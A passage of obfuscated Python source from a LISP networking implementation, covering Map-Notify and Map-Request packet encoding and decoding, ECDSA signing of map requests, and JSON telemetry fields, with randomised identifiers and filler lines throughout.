if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
i1oO0o00oOo00oO = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
if 68 - 68: OoO0O00 % IiII - oO0o - ooOoO0o . Oo0Ooo
packet += i1oO0o00oOo00oO
return ( packet )
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
def encode ( self , eid_records , password ) :
if ( self . map_notify_ack ) :
oOOOoOO = ( LISP_MAP_NOTIFY_ACK << 28 ) | self . record_count
else :
oOOOoOO = ( LISP_MAP_NOTIFY << 28 ) | self . record_count
if 4 - 4: Ii1I
OO0Oo00OO0oo = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OO0Oo00OO0oo += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . packet = OO0Oo00OO0oo + eid_records
return ( self . packet )
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
if 32 - 32: I1Ii111 / oO0o / I1IiiI
if 22 - 22: OoO0O00 - OoOoOO00 . Oo0Ooo + o0oOOo0O0Ooo
if 69 - 69: oO0o - I1IiiI
if 10 - 10: i1IIi / iII111i . II111iiii * i1IIi % OoooooooOO
OO0Oo00OO0oo = self . zero_auth ( OO0Oo00OO0oo )
OO0Oo00OO0oo += eid_records
if 83 - 83: I11i . OOooOOo + I1Ii111 * I11i . I1Ii111 + oO0o
iiIIII11iIii = lisp_hash_me ( OO0Oo00OO0oo , self . alg_id , password , False )
if 64 - 64: Ii1I . o0oOOo0O0Ooo - i1IIi
IiI1ii1Ii = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
OoooOOO0 = self . auth_len
self . auth_data = iiIIII11iIii
OO0Oo00OO0oo = OO0Oo00OO0oo [ 0 : IiI1ii1Ii ] + iiIIII11iIii + OO0Oo00OO0oo [ IiI1ii1Ii + OoooOOO0 : : ]
self . packet = OO0Oo00OO0oo
return ( OO0Oo00OO0oo )
if 35 - 35: I1ii11iIi11i % OoooooooOO
if 59 - 59: I1IiiI % I11i
def decode ( self , packet ) :
OOooo = packet
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 32 - 32: I1IiiI * O0 + O0
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
oOOOoOO = socket . ntohl ( oOOOoOO [ 0 ] )
self . map_notify_ack = ( ( oOOOoOO >> 28 ) == LISP_MAP_NOTIFY_ACK )
self . record_count = oOOOoOO & 0xff
packet = packet [ oOoOo000Ooooo : : ]
if 34 - 34: IiII
Iii1iIII1Iii = "QBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 5 - 5: OoO0O00 . I1IiiI
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 48 - 48: Oo0Ooo - OoO0O00 . I11i - iIii1I11I1II1 % Ii1I
self . nonce_key = lisp_hex_string ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
packet = packet [ oOoOo000Ooooo : : ]
self . eid_records = packet [ self . auth_len : : ]
if 47 - 47: iII111i / OoooooooOO - II111iiii
if ( self . auth_len == 0 ) : return ( self . eid_records )
if 91 - 91: OoOoOO00 + o0oOOo0O0Ooo
if 23 - 23: i1IIi
if 9 - 9: i1IIi % I1Ii111 - OoO0O00 * OoOoOO00 . o0oOOo0O0Ooo
if 18 - 18: Ii1I . OoOoOO00 + iII111i . I1IiiI + OoooooooOO . OoO0O00
if ( len ( packet ) < self . auth_len ) : return ( None )
if 31 - 31: I1Ii111 - I11i
OoooOOO0 = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
o00OOOOoOO , Ooo , OoOoo0ooo0 = struct . unpack ( "QQI" , packet [ : OoooOOO0 ] )
oO000oOo0oO0 = ""
if 49 - 49: iIii1I11I1II1 - iIii1I11I1II1 - OoOoOO00 + IiII / OoOoOO00
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
o00OOOOoOO , Ooo , OoOoo0ooo0 , oO000oOo0oO0 = struct . unpack ( "QQQQ" ,
packet [ : OoooOOO0 ] )
if 74 - 74: OoooooooOO + I1ii11iIi11i % O0
self . auth_data = lisp_concat_auth_data ( self . alg_id , o00OOOOoOO , Ooo ,
OoOoo0ooo0 , oO000oOo0oO0 )
if 32 - 32: I1ii11iIi11i + I1ii11iIi11i
oOoOo000Ooooo = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
packet = self . zero_auth ( OOooo [ : oOoOo000Ooooo ] )
oOoOo000Ooooo += OoooOOO0
packet += OOooo [ oOoOo000Ooooo : : ]
return ( packet )
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
if 12 - 12: OoOoOO00 - o0oOOo0O0Ooo - I1Ii111 / I11i
if 17 - 17: OoO0O00 - I1Ii111 - II111iiii / I1Ii111 / Ii1I
if 30 - 30: OOooOOo * I1ii11iIi11i % I1ii11iIi11i + iII111i * IiII
if 33 - 33: o0oOOo0O0Ooo + I11i * O0 * OoO0O00 . I1ii11iIi11i
if 74 - 74: iII111i * iII111i * o0oOOo0O0Ooo / oO0o
if 91 - 91: i11iIiiIii . I1ii11iIi11i / II111iiii
if 97 - 97: Ii1I % i1IIi % IiII + Oo0Ooo - O0 - I11i
if 64 - 64: Ii1I - iII111i
if 12 - 12: i1IIi
if 99 - 99: II111iiii - I1ii11iIi11i * IiII
if 3 - 3: IiII - I1ii11iIi11i * iII111i * I1ii11iIi11i + Oo0Ooo
if 15 - 15: I1ii11iIi11i * Ii1I / iII111i . o0oOOo0O0Ooo / Ii1I % OoOoOO00
if 75 - 75: OoooooooOO % i11iIiiIii % iIii1I11I1II1 % I1ii11iIi11i / i11iIiiIii
if 96 - 96: ooOoO0o * oO0o / iIii1I11I1II1 / I11i
if 5 - 5: o0oOOo0O0Ooo
if 83 - 83: I11i * I1IiiI . II111iiii * i1IIi % O0
if 35 - 35: OoOoOO00 % OoO0O00 + O0 * o0oOOo0O0Ooo % I1ii11iIi11i
if 57 - 57: oO0o / I11i
if 63 - 63: ooOoO0o * OoO0O00 * ooOoO0o + OoOoOO00
if 25 - 25: iII111i * OoOoOO00 / I1IiiI / IiII
if 11 - 11: OOooOOo + i11iIiiIii
if 14 - 14: OoOoOO00 / IiII + OoO0O00 - Ii1I
if 38 - 38: I1Ii111
if 30 - 30: II111iiii + I11i . i11iIiiIii + iIii1I11I1II1
if 100 - 100: oO0o * o0oOOo0O0Ooo / iII111i
if 92 - 92: ooOoO0o / i11iIiiIii * OOooOOo
if 55 - 55: ooOoO0o
if 1 - 1: OoO0O00
if 43 - 43: iIii1I11I1II1 - OOooOOo - o0oOOo0O0Ooo + I1ii11iIi11i - I1Ii111 % I1ii11iIi11i
if 58 - 58: OoOoOO00
if 27 - 27: IiII * OOooOOo - OoooooooOO . Ii1I - II111iiii
if 62 - 62: I1IiiI / iIii1I11I1II1 * I11i
if 84 - 84: IiII - OoOoOO00 . IiII + ooOoO0o . iII111i
if 96 - 96: Ii1I % iII111i * Ii1I % I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 7 - 7: OoO0O00 - ooOoO0o % i1IIi
if 24 - 24: OoO0O00 % O0 % I11i
if 61 - 61: ooOoO0o . iII111i / ooOoO0o * OoooooooOO
if 13 - 13: II111iiii
if 17 - 17: II111iiii
if 66 - 66: IiII * oO0o
if 73 - 73: i11iIiiIii + O0 % O0
if 70 - 70: II111iiii * OoooooooOO - Ii1I + oO0o * O0
if 49 - 49: oO0o . Ii1I . OoOoOO00 - I1ii11iIi11i
if 74 - 74: ooOoO0o % I1ii11iIi11i * i1IIi
if 18 - 18: OoOoOO00
if 30 - 30: II111iiii
if 27 - 27: i1IIi - iIii1I11I1II1 + O0 % Oo0Ooo / OOooOOo + i1IIi
if 48 - 48: Oo0Ooo
if 70 - 70: OoooooooOO * i11iIiiIii
class lisp_map_request ( object ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
self . json_telemetry = None
if 60 - 60: IiII / iIii1I11I1II1 + OoooooooOO - I1ii11iIi11i * i11iIiiIii
if 47 - 47: O0 . I1IiiI / ooOoO0o % i11iIiiIii
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 47 - 47: Ii1I . OoOoOO00 . iIii1I11I1II1 . o0oOOo0O0Ooo
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 39 - 39: o0oOOo0O0Ooo
if 89 - 89: OoooooooOO + iII111i . I1Ii111 / Ii1I
def print_map_request ( self ) :
oOOoO = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
oOOoO = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 75 - 75: iIii1I11I1II1 * iII111i / OoOoOO00 * II111iiii . i1IIi
if 6 - 6: Ii1I % Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
if 59 - 59: I11i . I11i * I1IiiI - Ii1I % OoOoOO00
i11 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 19 - 19: OoooooooOO / Oo0Ooo - I1Ii111 . OoOoOO00
lprint ( i11 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# OoOoOO00
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , oOOoO ) )
if 82 - 82: ooOoO0o . I1Ii111 . Oo0Ooo % iIii1I11I1II1 - i11iIiiIii
O0o0O0 = self . keys
for I1IoOO0oOOOOO0 in self . itr_rlocs :
if ( I1IoOO0oOOOOO0 . afi == LISP_AFI_LCAF and self . json_telemetry != None ) :
continue
if 99 - 99: OoOoOO00 . I1Ii111 * II111iiii - i11iIiiIii + I11i
I1iii1iIiI111 = red ( I1IoOO0oOOOOO0 . print_address_no_iid ( ) , False )
lprint ( " itr-rloc: afi {} {}{}" . format ( I1IoOO0oOOOOO0 . afi , I1iii1iIiI111 ,
"" if ( O0o0O0 == None ) else ", " + O0o0O0 [ 1 ] . print_keys ( ) ) )
O0o0O0 = None
if 77 - 77: oO0o / iIii1I11I1II1 % I1IiiI / o0oOOo0O0Ooo / II111iiii - I1Ii111
if ( self . json_telemetry != None ) :
lprint ( " itr-rloc: afi {} telemetry: {}" . format ( LISP_AFI_LCAF ,
self . json_telemetry ) )
if 4 - 4: i1IIi
if 97 - 97: OoooooooOO / i11iIiiIii % O0
if 17 - 17: I1Ii111 + i11iIiiIii . i11iIiiIii * i1IIi / O0
def sign_map_request ( self , privkey ) :
Ii1IiI = self . signature_eid . print_address ( )
Ooo0o00O0O0oO = self . source_eid . print_address ( )
OO000OOO = self . target_eid . print_address ( )
o000OOooo000O = lisp_hex_string ( self . nonce ) + Ooo0o00O0O0oO + OO000OOO
self . map_request_signature = privkey . sign ( o000OOooo000O )
oo0 = binascii . b2a_base64 ( self . map_request_signature )
oo0 = { "source-eid" : Ooo0o00O0O0oO , "signature-eid" : Ii1IiI ,
"signature" : oo0 }
return ( json . dumps ( oo0 ) )
if 96 - 96: O0
if 89 - 89: I1ii11iIi11i - Oo0Ooo
def verify_map_request_sig ( self , pubkey ) :
I1i1ii1iIii = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( I1i1ii1iIii ) )
return ( False )
if 42 - 42: I1IiiI
if 95 - 95: I1ii11iIi11i / IiII % iIii1I11I1II1 + O0
Ooo0o00O0O0oO = self . source_eid . print_address ( )
OO000OOO = self . target_eid . print_address ( )
o000OOooo000O = lisp_hex_string ( self . nonce ) + Ooo0o00O0O0oO + OO000OOO
pubkey = binascii . a2b_base64 ( pubkey )
if 6 - 6: IiII
OOoO0OOO00 = True
try :
III11II111 = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 15 - 15: o0oOOo0O0Ooo . O0 - I1IiiI / i1IIi . oO0o * OoooooooOO
OOoO0OOO00 = False
if 32 - 32: ooOoO0o / II111iiii . O0 . ooOoO0o % I1IiiI - o0oOOo0O0Ooo
if 69 - 69: Ii1I - I1IiiI * OOooOOo . iIii1I11I1II1 * OoOoOO00 . OoooooooOO
if ( OOoO0OOO00 ) :
try :
OOoO0OOO00 = III11II111 . verify ( self . map_request_signature , o000OOooo000O )
except :
OOoO0OOO00 = False
if 6 - 6: O0 . o0oOOo0O0Ooo - OoOoOO00
if 3 - 3: OoooooooOO % iIii1I11I1II1 * I1Ii111 % Oo0Ooo + iIii1I11I1II1
if 66 - 66: Oo0Ooo - OoOoOO00
I111 = bold ( "passed" if OOoO0OOO00 else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( I111 , I1i1ii1iIii ) )
return ( OOoO0OOO00 )
if 76 - 76: ooOoO0o % I1IiiI
if 18 - 18: OoO0O00
def encode_json ( self , json_string ) :
ooOoOoOo = LISP_LCAF_JSON_TYPE
O0oOo = socket . htons ( LISP_AFI_LCAF )
iIi1IiiIII = socket . htons ( len ( json_string ) + 4 )
i11iI1I1I11II = socket . htons ( len ( json_string ) )
OO0Oo00OO0oo = struct . pack ( "HBBBBHH" , O0oOo , 0 , 0 , ooOoOoOo , 0 , iIi1IiiIII ,
i11iI1I1I11II )
OO0Oo00OO0oo += json_string . encode ( )
OO0Oo00OO0oo += struct . pack ( "H" , 0 )
return ( OO0Oo00OO0oo )
if 70 - 70: iIii1I11I1II1 . ooOoO0o * oO0o
if 45 - 45: OoO0O00 * II111iiii * OoOoOO00 - OOooOOo % oO0o - Oo0Ooo
def encode ( self , probe_dest , probe_port ) :
oOOOoOO = ( LISP_MAP_REQUEST << 28 ) | self . record_count
if 4 - 4: o0oOOo0O0Ooo . OoOoOO00 - iIii1I11I1II1 / IiII / I1IiiI % I1IiiI
Iiii1I = lisp_telemetry_configured ( ) if ( self . rloc_probe ) else None
if ( Iiii1I != None ) : self . itr_rloc_count += 1
oOOOoOO = oOOOoOO | ( self . itr_rloc_count << 8 )
if 26 - 26: Oo0Ooo + OoooooooOO - OOooOOo * II111iiii / iII111i
if ( self . auth_bit ) : oOOOoOO |= 0x08000000
if ( self . map_data_present ) : oOOOoOO |= 0x04000000
if ( self . rloc_probe ) : oOOOoOO |= 0x02000000
if ( self . smr_bit ) : oOOOoOO |= 0x01000000
if ( self . pitr_bit ) : oOOOoOO |= 0x00800000
if ( self . smr_invoked_bit ) : oOOOoOO |= 0x00400000
if ( self . mobile_node ) : oOOOoOO |= 0x00200000
if ( self . xtr_id_present ) : oOOOoOO |= 0x00100000
if ( self . local_xtr ) : oOOOoOO |= 0x00004000
if ( self . dont_reply_bit ) : oOOOoOO |= 0x00002000
if 77 - 77: I11i
OO0Oo00OO0oo = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OO0Oo00OO0oo += struct . pack ( "Q" , self . nonce )
if 50 - 50: o0oOOo0O0Ooo - OoOoOO00
if 1 - 1: i1IIi / Ii1I % IiII - I11i % o0oOOo0O0Ooo
if 28 - 28: ooOoO0o - IiII + iII111i . ooOoO0o % OoooooooOO
if 17 - 17: OOooOOo / iII111i / IiII / OoO0O00 . I11i / o0oOOo0O0Ooo
if 1 - 1: iIii1I11I1II1 + IiII % ooOoO0o + O0 / iIii1I11I1II1 % OoO0O00
if 83 - 83: i11iIiiIii * II111iiii . i1IIi * I1Ii111
i11oO0oOO000 = False
OoOoO0O0oOo = self . privkey_filename
if ( OoOoO0O0oOo != None and os . path . exists ( OoOoO0O0oOo ) ) :
iiI1i1I = open ( OoOoO0O0oOo , "r" ) ; III11II111 = iiI1i1I . read ( ) ; iiI1i1I . close ( )
try :
III11II111 = ecdsa . SigningKey . from_pem ( III11II111 )
except :
return ( None )
if 68 - 68: i11iIiiIii - OoOoOO00 . I11i % I1Ii111 + i11iIiiIii . OOooOOo
Ii111I1iIiiIi = self . sign_map_request ( III11II111 )
i11oO0oOO000 = True
elif ( self . map_request_signature != None ) :
oo0 = binascii . b2a_base64 ( self . map_request_signature )
Ii111I1iIiiIi = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : oo0 }
Ii111I1iIiiIi = json . dumps ( Ii111I1iIiiIi )
i11oO0oOO000 = True
if 45 - 45: IiII * Ii1I . o0oOOo0O0Ooo
if ( i11oO0oOO000 ) :
OO0Oo00OO0oo += self . encode_json ( Ii111I1iIiiIi )
else :
if ( self . source_eid . instance_id != 0 ) :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
OO0Oo00OO0oo += self . source_eid . lcaf_encode_iid ( )
else :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
OO0Oo00OO0oo += self . source_eid . pack_address ( )
if 68 - 68: Oo0Ooo + o0oOOo0O0Ooo * OOooOOo . II111iiii % Ii1I
if 14 - 14: OoooooooOO * Oo0Ooo % ooOoO0o . Ii1I - iII111i - II111iiii
if 67 - 67: iII111i
if 69 - 69: OOooOOo + iII111i / I1Ii111
if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
if 93 - 93: ooOoO0o + ooOoO0o
if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
Oo0o = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
if ( Oo0o in lisp_crypto_keys_by_rloc_encap ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ Oo0o ]
if 32 - 32: Oo0Ooo . O0
if 48 - 48: I1ii11iIi11i % II111iiii + I11i
if 25 - 25: IiII * o0oOOo0O0Ooo / I1IiiI . IiII % II111iiii
if 50 - 50: OoOoOO00 * iII111i
if 59 - 59: I1IiiI * I1IiiI / I11i
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: iII111i + I1ii11iIi11i . Ii1I
for I1IoOO0oOOOOO0 in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( I1IoOO0oOOOOO0 ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
O0o0O0 = lisp_keys ( 1 )
self . keys = [ None , O0o0O0 , None , None ]
if 50 - 50: Oo0Ooo
O0o0O0 = self . keys [ 1 ]
O0o0O0 . add_key_by_nonce ( self . nonce )
OO0Oo00OO0oo += O0o0O0 . encode_lcaf ( I1IoOO0oOOOOO0 )
else :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( I1IoOO0oOOOOO0 . afi ) )
OO0Oo00OO0oo += I1IoOO0oOOOOO0 . pack_address ( )
if 16 - 16: Ii1I - OoOoOO00 % Oo0Ooo / Ii1I . I11i + ooOoO0o
if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
if 22 - 22: i1IIi / OoooooooOO . OoO0O00
if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
if 90 - 90: I1IiiI - i11iIiiIii
if ( Iiii1I != None ) :
i1 = str ( time . time ( ) )
Iiii1I = lisp_encode_telemetry ( Iiii1I , io = i1 )
self . json_telemetry = Iiii1I
OO0Oo00OO0oo += self . encode_json ( Iiii1I )
if 42 - 42: OOooOOo . Oo0Ooo
if 21 - 21: iII111i . I1IiiI / I11i
ooOoO00 = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 61 - 61: i11iIiiIii % I1Ii111 / o0oOOo0O0Ooo
if 40 - 40: OOooOOo / Ii1I % I1IiiI / o0oOOo0O0Ooo . iII111i
o00o0Ooo = 0
if ( self . subscribe_bit ) :
o00o0Ooo = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 20 - 20: OoOoOO00 / o0oOOo0O0Ooo % OoOoOO00 * I1IiiI
if 26 - 26: I11i . iII111i . o0oOOo0O0Ooo
if 15 - 15: OoO0O00 / iII111i
Iii1iIII1Iii = "BB"
OO0Oo00OO0oo += struct . pack ( Iii1iIII1Iii , o00o0Ooo , ooOoO00 )
if 46 - 46: OoooooooOO . I1Ii111
if ( self . target_group . is_null ( ) == False ) :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
OO0Oo00OO0oo += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
OO0Oo00OO0oo += self . target_eid . lcaf_encode_iid ( )
else :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
OO0Oo00OO0oo += self . target_eid . pack_address ( )
if 15 - 15: Ii1I
if 84 - 84: OoOoOO00 - ooOoO0o - OoooooooOO . OoooooooOO % IiII
if 38 - 38: OoO0O00 * I1ii11iIi11i
if 4 - 4: OoO0O00 . I1ii11iIi11i
if 21 - 21: i11iIiiIii / OoO0O00 / I1ii11iIi11i * O0 - II111iiii * OOooOOo
if ( self . subscribe_bit ) : OO0Oo00OO0oo = self . encode_xtr_id ( OO0Oo00OO0oo )
return ( OO0Oo00OO0oo )
if 27 - 27: o0oOOo0O0Ooo . OoOoOO00 * Ii1I * iII111i * O0
if 93 - 93: IiII % I1Ii111 % II111iiii
def lcaf_decode_json ( self , packet ) :
Iii1iIII1Iii = "BBBBHH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 20 - 20: OoooooooOO * I1Ii111
i1ii1iiI11ii1II1 , IIi1 , ooOoOoOo , oo0oOOo0 , iIi1IiiIII , i11iI1I1I11II = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 57 - 57: OoO0O00 . Oo0Ooo + I1IiiI
if 18 - 18: I1IiiI - I1ii11iIi11i * I11i / i11iIiiIii - o0oOOo0O0Ooo % o0oOOo0O0Ooo
if ( ooOoOoOo != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 31 - 31: I11i
if 100 - 100: i11iIiiIii * i11iIiiIii . iIii1I11I1II1 % iII111i * I1ii11iIi11i
if 17 - 17: Ii1I * IiII * i11iIiiIii / I1ii11iIi11i / i11iIiiIii
if 23 - 23: OoooooooOO + i11iIiiIii / Oo0Ooo / iII111i . iII111i * I1IiiI
iIi1IiiIII = socket . ntohs ( iIi1IiiIII )
i11iI1I1I11II = socket . ntohs ( i11iI1I1I11II )
packet = packet [ oOoOo000Ooooo : : ]
if ( len ( packet ) < iIi1IiiIII ) : return ( None )
if ( iIi1IiiIII != i11iI1I1I11II + 4 ) : return ( None )
if 98 - 98: IiII
if 23 - 23: I11i / i1IIi * OoO0O00
if 51 - 51: OOooOOo - OoooooooOO / OoooooooOO % OoooooooOO
if 85 - 85: OoO0O00 . o0oOOo0O0Ooo . I1IiiI
Ii111I1iIiiIi = packet [ 0 : i11iI1I1I11II ]
packet = packet [ i11iI1I1I11II : : ]
if 75 - 75: iIii1I11I1II1 - Ii1I % O0 % IiII
if 6 - 6: Oo0Ooo % oO0o * ooOoO0o - i1IIi . OoOoOO00
if 20 - 20: Oo0Ooo / I1Ii111 . Oo0Ooo
if 60 - 60: I1ii11iIi11i - I1IiiI * O0 * Oo0Ooo . i1IIi . OoOoOO00
if ( lisp_is_json_telemetry ( Ii111I1iIiiIi ) != None ) :
self . json_telemetry = Ii111I1iIiiIi
if 24 - 24: IiII * I1IiiI / OOooOOo
if 51 - 51: iIii1I11I1II1 / I11i * OoO0O00 * Ii1I + I1ii11iIi11i . OoooooooOO
if 75 - 75: IiII / OoooooooOO / O0 % OOooOOo
if 87 - 87: II111iiii / iIii1I11I1II1 % I1ii11iIi11i
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if ( O0ooO0O00oo0 != 0 ) : return ( packet )
if 92 - 92: OoOoOO00 . Oo0Ooo * I11i
if ( self . json_telemetry != None ) : return ( packet )
if 86 - 86: O0
if 55 - 55: Ii1I / I1Ii111 / I1ii11iIi11i % ooOoO0o % I1IiiI
if 55 - 55: oO0o + OoooooooOO % i1IIi
if 24 - 24: I1ii11iIi11i - Oo0Ooo
try :
Ii111I1iIiiIi = json . loads ( Ii111I1iIiiIi )
except :
return ( None )
if 36 - 36: I1IiiI . OOooOOo % II111iiii * IiII
if 34 - 34: I11i % iII111i - ooOoO0o - I1IiiI
if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
if ( "source-eid" not in Ii111I1iIiiIi ) : return ( packet )
I11I = Ii111I1iIiiIi [ "source-eid" ]
O0ooO0O00oo0 = LISP_AFI_IPV4 if I11I . count ( "." ) == 3 else LISP_AFI_IPV6 if I11I . count ( ":" ) == 7 else None
if 10 - 10: i1IIi % II111iiii / I1ii11iIi11i - oO0o % Oo0Ooo - iII111i
if ( O0ooO0O00oo0 == None ) :
lprint ( "Bad JSON 'source-eid' value: {}" . format ( I11I ) )
return ( None )
if 45 - 45: Oo0Ooo
if 27 - 27: iII111i + Oo0Ooo * O0 / oO0o * i11iIiiIii
self . source_eid . afi = O0ooO0O00oo0
self . source_eid . store_address ( I11I )
if 24 - 24: I11i
if ( "signature-eid" not in Ii111I1iIiiIi ) : return ( packet )
I11I = Ii111I1iIiiIi [ "signature-eid" ]
if ( I11I . count ( ":" ) != 7 ) :
lprint ( "Bad JSON 'signature-eid' value: {}" . format ( I11I ) )
return ( None )
if 9 - 9: i1IIi + oO0o
if 14 - 14: O0 + I1ii11iIi11i
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( I11I )
if 39 - 39: i11iIiiIii
if ( "signature" not in Ii111I1iIiiIi ) : return ( packet )
oo0 = binascii . a2b_base64 ( Ii111I1iIiiIi [ "signature" ] )
self . map_request_signature = oo0
return ( packet )
if 97 - 97: OoOoOO00 . Oo0Ooo . I1Ii111 + iII111i % ooOoO0o . IiII
if 40 - 40: I1Ii111 - i11iIiiIii
def decode ( self , packet , source , port ) :
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 58 - 58: II111iiii / O0
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
oOOOoOO = oOOOoOO [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if 83 - 83: OOooOOo * IiII / OoO0O00 / i11iIiiIii
Iii1iIII1Iii = "Q"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 94 - 94: O0 / iIii1I11I1II1 + O0 / I1IiiI
OOO0O0O = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
packet = packet [ oOoOo000Ooooo : : ]
if 90 - 90: OoooooooOO * OoooooooOO
oOOOoOO = socket . ntohl ( oOOOoOO )
self . auth_bit = True if ( oOOOoOO & 0x08000000 ) else False
self . map_data_present = True if ( oOOOoOO & 0x04000000 ) else False
